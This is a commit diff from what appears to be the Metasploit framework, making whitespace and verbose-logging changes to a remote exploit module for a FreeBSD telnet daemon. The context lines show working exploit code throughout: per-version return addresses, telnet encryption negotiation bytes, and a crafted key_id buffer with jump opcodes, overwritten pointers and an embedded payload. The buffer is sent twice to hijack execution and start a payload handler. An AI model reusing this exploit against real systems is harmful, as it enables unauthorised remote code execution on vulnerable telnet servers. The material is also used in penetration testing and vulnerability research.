Whitespace cleanup, also change print_status usage when verbose
sinn3r
parent
2f9d563067
commit
03a39f7fe8
|
|
@ -15,7 +15,7 @@ require 'msf/core'
|
|||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
|
||||
include Msf::Exploit::Remote::Telnet
|
||||
include Msf::Exploit::BruteTargets
|
||||
|
||||
|
|
@ -45,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ],
|
||||
[ 'Automatic', { } ],
|
||||
[ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx
|
||||
[ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx
|
||||
[ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx
|
||||
|
|
@ -63,10 +63,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit_target(t)
|
||||
|
||||
|
||||
connect
|
||||
banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
|
||||
print_status(banner_sanitized) if datastore['VERBOSE']
|
||||
vprint_status(banner_sanitized)
|
||||
|
||||
enc_init = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0"
|
||||
enc_keyid = "\xff\xfa\x26\x07"
|
||||
|
|
@ -74,18 +74,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Telnet protocol requires 0xff to be escaped with another
|
||||
penc = payload.encoded.gsub("\xff", "\xff\xff")
|
||||
|
||||
|
||||
key_id = Rex::Text.rand_text_alphanumeric(400)
|
||||
key_id[ 0, 2] = "\xeb\x76"
|
||||
key_id[ 0, 2] = "\xeb\x76"
|
||||
key_id[72, 4] = [ t['Ret'] - 20 ].pack("V")
|
||||
key_id[76, 4] = [ t['Ret'] ].pack("V")
|
||||
|
||||
key_id[76, 4] = [ t['Ret'] ].pack("V")
|
||||
|
||||
# Some of these bytes can get mangled, jump over them
|
||||
key_id[80,112] = Rex::Text.rand_text_alphanumeric(112)
|
||||
|
||||
|
||||
# Bounce to the real payload (avoid corruption)
|
||||
key_id[120, 2] = "\xeb\x46"
|
||||
|
||||
|
||||
# The actual payload
|
||||
key_id[192, penc.length] = penc
|
||||
|
||||
|
|
@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Initiate encryption
|
||||
sock.put(enc_init)
|
||||
|
||||
|
||||
# Wait for a successful response
|
||||
loop do
|
||||
data = sock.get_once(-1, 5) rescue nil
|
||||
|
|
@ -106,8 +106,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# The first request smashes the pointer
|
||||
print_status("Sending first payload")
|
||||
sock.put(sploit)
|
||||
|
||||
sock.put(sploit)
|
||||
|
||||
# Make sure the server replied to the first request
|
||||
data = sock.get_once(-1, 5)
|
||||
unless data
|
||||
|
|
@ -117,13 +117,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Some delay between each request seems necessary in some cases
|
||||
::IO.select(nil, nil, nil, 0.5)
|
||||
|
||||
|
||||
# The second request results in the pointer being called
|
||||
print_status("Sending second payload...")
|
||||
sock.put(sploit)
|
||||
|
||||
|
||||
handler
|
||||
|
||||
|
||||
::IO.select(nil, nil, nil, 0.5)
|
||||
disconnect
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue